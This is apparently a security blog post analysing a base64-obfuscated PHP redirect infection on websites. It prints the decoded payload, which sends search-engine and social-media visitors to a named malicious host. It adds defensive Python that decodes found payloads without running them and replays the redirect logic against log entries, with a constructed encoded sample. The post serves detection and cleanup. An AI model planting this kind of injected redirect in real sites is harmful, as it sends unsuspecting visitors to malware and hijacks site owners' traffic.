The Latest in IT Security

Conditional Redirect Malware Decoded – Eval base64_decode Example

15 Mar 2012

I have this beautiful website and now there’s all this garbled code across all of my PHP files. What’s it do, and how did it get there?

This is a quick post to show you some encoded crud that can attack your site, and do some pretty bad stuff.

Encoded Payload – eval(base64_decode())

Generally speaking, we see this type of payload dropped into PHP, HTML, and JavaScript files. They are typically dropped into an environment through a known vulnerability in outdated software. This isn’t the only entry point, but definitely the one we see the most.

eval(base64_decode("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"));

Hard to tell what it’s doing, and to someone that’s not into code, this may not look any different than the rest of the code found in a web file.
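The first thing a responder wants is to read the payload without running it. The following scanner is an added example, not code from the original post or from Sucuri: it finds eval(base64_decode("...")) wrappers in a file's text, base64-decodes them (following nested wrappers, a common layering trick) and reports the plaintext. Because the real base64 string is not reproduced on this page, the fixture below is a constructed stand-in wrapped twice and injected into a wp-config.php-style file; the inner PHP, the file name and the host redirect.example are all assumptions for the sake of the demo.

```python
"""Find and decode eval(base64_decode("...")) wrappers in web files without running them."""
import base64
import binascii
import re

# eval(base64_decode("<b64>")) or eval(base64_decode('<b64>')), tolerating the
# whitespace droppers sometimes add. Group 2 is the base64 text between the quotes.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)


def decode_layers(b64_text, max_depth=10):
    """Decode one payload and keep going while each result is itself another
    eval(base64_decode(...)) wrapper. Returns the decoded strings, outermost
    first. Only base64 decoding happens here; nothing is executed."""
    layers = []
    current = b64_text
    while len(layers) < max_depth:
        try:
            decoded = base64.b64decode(
                re.sub(r"\s+", "", current), validate=True
            ).decode("utf-8", errors="replace")
        except (binascii.Error, ValueError):
            break  # not valid base64: stop and report what we have so far
        layers.append(decoded)
        inner = EVAL_B64_RE.search(decoded)
        if inner is None:
            break
        current = inner.group(2)
    return layers


def find_encoded_evals(source):
    """Return one finding per wrapper in `source` (the text of a PHP/HTML/JS file)."""
    findings = []
    for match in EVAL_B64_RE.finditer(source):
        layers = decode_layers(match.group(2))
        findings.append({
            "line": source.count("\n", 0, match.start()) + 1,
            "encoded_prefix": match.group(2)[:40],
            "layers": layers,
            "decoded": layers[-1] if layers else None,
        })
    return findings


def scan_file(path):
    """Scan one file on disk; errors='replace' keeps binary junk from aborting the scan."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_encoded_evals(fh.read())


# Constructed fixture (NOT the real payload, whose base64 is not reproduced on
# the page): a small stand-in for the conditional-redirect code, wrapped twice
# and injected into a wp-config.php-style file. Host name is made up.
INNER_PHP = (
    'error_reporting(0);'
    'if (stristr($_SERVER["HTTP_REFERER"], "bing")) {'
    'header("Location: http://redirect.example/"); exit(); }'
)
ENCODED_ONCE = base64.b64encode(INNER_PHP.encode()).decode()
ENCODED_TWICE = base64.b64encode(
    f'eval(base64_decode("{ENCODED_ONCE}"));'.encode()
).decode()
SAMPLE_FILE = (
    "<?php\n"
    "// wp-config.php (constructed sample)\n"
    "define('DB_NAME', 'site');\n"
    f"eval(base64_decode('{ENCODED_TWICE}'));\n"
    "require_once ABSPATH . 'wp-settings.php';\n"
)

if __name__ == "__main__":
    for finding in find_encoded_evals(SAMPLE_FILE):
        print(f"line {finding['line']}: {len(finding['layers'])} layer(s) of base64")
        print(finding["decoded"])
```

Point scan_file() at the files you suspect (or loop it over a directory tree) and read the decoded text; a header("Location: ...") inside it is the giveaway for this family. Decoding is deliberately the only thing the script does: never paste a found payload into php -r or an online "eval" tool to see what it does.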

Decoded Payload – Conditional Redirect Malware

When you decode the obfuscated payload you get a much better idea of what it is doing.

Here’s the full payload decoded:

error_reporting(0);                      // hide any warnings from the site owner
$qazplm = headers_sent();
if (!$qazplm) {                          // a redirect only works before output starts
    $referer = $_SERVER['HTTP_REFERER'];
    $uag = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag, "MSIE 7.0")) {
            if (stristr($referer, "yahoo") or stristr($referer, "bing")
                or stristr($referer, "rambler") or stristr($referer, "gogo")
                or stristr($referer, "live.com") or stristr($referer, "aport")
                or stristr($referer, "nigma") or stristr($referer, "webalta")
                or stristr($referer, "begun.ru") or stristr($referer, "stumbleupon.com")
                or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url\?sa/", $referer)
                or stristr($referer, "myspace.com") or stristr($referer, "facebook.com")
                or stristr($referer, "aol.com")) {
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://gigop.americanunfinished.com/");
                    exit();
                }
            }
        }
    }
}

Why so dangerous? What’s it do?

After decoding, you’re able to quickly tell that this malicious payload is a conditional redirect malware string.

Lets break down what it’s doing:

Targeting User Agents

Once the string is in place, every request for that page is checked for the browser type (User-Agent). In this instance the following line adds a condition that matches every user agent excluding IE7:

if (!stristr($uag, "MSIE 7.0"))

What’s the traffic source?

If the request comes from any browser other than IE7, the script carries on and checks the next condition: whether the visitor arrived from one of a specific list of referrers:

if (stristr($referer, "yahoo") or stristr($referer, "bing")
    or stristr($referer, "rambler") or stristr($referer, "gogo")
    or stristr($referer, "live.com") or stristr($referer, "aport")
    or stristr($referer, "nigma") or stristr($referer, "webalta")
    or stristr($referer, "begun.ru") or stristr($referer, "stumbleupon.com")
    or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
    or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
    or preg_match("/google\.(.*?)\/url\?sa/", $referer)
    or stristr($referer, "myspace.com") or stristr($referer, "facebook.com")
    or stristr($referer, "aol.com")) {

This matches traffic arriving from Yahoo, Bing, Rambler, Yandex and Google search results, Facebook, URL shorteners and the rest of the list. Only when both conditions hold (a non-IE7 browser and a matching referrer) does the script take its action; otherwise it does nothing and the page is served normally. That is what makes this kind of infection hard to spot: the site owner usually types the URL directly or follows a bookmark, sends no matching referrer, and never sees the redirect.

Action on your behalf

We see a lot of different conditionals, and the action varies. In this case, you get redirected. The inner check is meant to skip visitors coming from a search engine's cached copy, but it is written with "or", so the exemption only applies when the referrer contains both "cache" and "inurl"; either word on its own still triggers the redirect:

if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
    header("Location: http://gigop.americanunfinished.com/");
    exit();
}

Your visitors are now being redirected to a site that has been blacklisted for known distribution of malware:

[Screenshot: SiteCheck result showing the redirect target as a blacklisted website]

Note: Not only is your site redirecting to a blacklisted website, that website is also down for the count. End users who meet the conditional criteria will land on a 403 page.

[Screenshot: the blacklisted redirect target returning a 403 error]
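To see exactly which visitors the three checks above single out, it helps to run the decision logic over real request data. The block below is an added example, not part of the original post: it re-implements the decoded payload's nested ifs in Python (stristr() as a case-insensitive substring test, the two preg_match() patterns as Python regexes) and runs them over a handful of constructed (user agent, referer) pairs of the kind you would pull from an access log. The sample requests are made up for the demo; nothing here sends a header.

```python
"""Re-implementation of the decoded payload's decision logic, to see which
visitors get redirected. Python stand-in for the PHP; nothing here sends headers."""
import re

# Referrer substrings the payload tests with stristr() (case-insensitive).
REFERER_SUBSTRINGS = (
    "yahoo", "bing", "rambler", "gogo", "live.com", "aport", "nigma", "webalta",
    "begun.ru", "stumbleupon.com", "bit.ly", "tinyurl.com",
    "myspace.com", "facebook.com", "aol.com",
)
# The two preg_match() patterns from the payload, as Python regexes.
REFERER_PATTERNS = (
    re.compile(r"yandex\.ru/yandsearch\?(.*?)&lr="),
    re.compile(r"google\.(.*?)/url\?sa"),
)
REDIRECT_TARGET = "http://gigop.americanunfinished.com/"


def stristr(haystack, needle):
    """Truth value of PHP stristr(): needle occurs in haystack, ignoring case.
    A missing header arrives as None, which PHP treats as an empty string."""
    return needle.lower() in (haystack or "").lower()


def decide(user_agent, referer):
    """Walk the payload's nested ifs for one request and return the Location
    the visitor would be sent to, or None when the page is served normally."""
    if not user_agent:                              # if ($uag) {
        return None
    if stristr(user_agent, "MSIE 7.0"):             # if (!stristr($uag, "MSIE 7.0")) {
        return None
    from_search = (
        any(stristr(referer, s) for s in REFERER_SUBSTRINGS)
        or any(p.search(referer or "") for p in REFERER_PATTERNS)
    )
    if not from_search:
        return None
    # Written with `or` in the payload, so the exemption needs BOTH words:
    # a referer with only "cache" (or only "inurl") is still redirected.
    if not stristr(referer, "cache") or not stristr(referer, "inurl"):
        return REDIRECT_TARGET
    return None


# Constructed (user agent, referer) pairs of the kind you would pull from an
# access log; none of them come from a real log.
SAMPLE_REQUESTS = {
    "owner typing the URL":   ("Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0", None),
    "google click, firefox":  ("Mozilla/5.0 (Windows NT 6.1) Firefox/10.0",
                               "http://www.google.com/url?sa=t&rct=j&q=example+site"),
    "google click, ie7":      ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
                               "http://www.google.com/url?sa=t&rct=j&q=example+site"),
    "bing, empty user agent": ("", "http://www.bing.com/search?q=example+site"),
    "yandex search":          ("Mozilla/5.0 (Windows NT 6.1) Chrome/17.0",
                               "http://yandex.ru/yandsearch?text=example&lr=213"),
    "google cache only":      ("Mozilla/5.0 (Windows NT 6.1) Chrome/17.0",
                               "http://www.google.com/url?sa=t&q=cache:example.com"),
    "google cache + inurl":   ("Mozilla/5.0 (Windows NT 6.1) Chrome/17.0",
                               "http://www.google.com/url?sa=t&q=cache:inurl:example.com"),
    "bare google referer":    ("Mozilla/5.0 (Windows NT 6.1) Chrome/17.0",
                               "https://www.google.com/"),
}


def redirected_requests(samples=SAMPLE_REQUESTS):
    """Map each sample label to the redirect target it would get, or None."""
    return {label: decide(ua, ref) for label, (ua, ref) in samples.items()}


if __name__ == "__main__":
    for label, target in redirected_requests().items():
        print(f"{label:24s} -> {target or 'served normally'}")
```

Two of the samples are worth a second look. "google cache only" is still redirected, which is the "or" slip in the payload's last check. "bare google referer" is not redirected at all: the Google pattern expects the old /url?sa= click-through URL in the referrer, so a referrer of just https://www.google.com/ slips past it. Feeding your own log tuples into decide() gives you the list of visitors who actually received the Location header, which is what you need for notification and for confirming the cleanup worked.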
